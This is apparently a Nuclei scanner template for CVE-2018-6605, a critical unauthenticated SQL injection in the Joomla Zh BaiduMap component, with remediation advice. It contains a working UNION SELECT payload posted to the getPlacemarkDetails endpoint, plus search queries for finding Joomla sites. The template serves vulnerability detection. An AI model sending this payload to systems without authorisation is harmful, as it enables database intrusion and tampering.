id: CVE-2018-6605 info: name: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection author: DhiyaneshDk severity: critical description: | SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request. impact: | Unauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Joomla installation. remediation: | Remove the vulnerable Zh BaiduMap component or upgrade to a patched version. reference: - https://github.com/ARPSyndicate/cvemon - https://github.com/C0reL0ader/EaST/blob/master/exploits/efa_joomla_zh_baidumap_sqli.py - https://www.exploit-db.com/exploits/43974 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-6605 cwe-id: CWE-89 epss-score: 0.57702 epss-percentile: 0.9904 cpe: cpe:2.3:a:zh_baidumap_project:zh_baidumap:3.0.0.1:*:*:*:*:joomla\!:*:* metadata: max-request: 1 vendor: zh_baidumap_project product: zh_baidumap framework: joomla\! fofa-query: - app="Joomla!-网站安装" - app="joomla!-网站安装" tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project,vkev,vuln variables: num: "{{rand_int(2000000000, 2100000000)}}" http: - method: POST path: - "{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails" headers: Content-Type: application/x-www-form-urlencoded body: "id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+" matchers-condition: and matchers: - type: word words: - "{{md5(num)}}" - "dataexists" part: body - type: status status: - 200 # digest: 4b0a00483046022100c6e83aa268b8d3029e80bbd10a0f2d7ec080059431f346561fdb60f286996ef2022100fbb1d2d841dfca37dfac34b1bfef5484a47243b92cf30b67648e57175d0ede4d:922c64590222798bb761d5b6d8e72950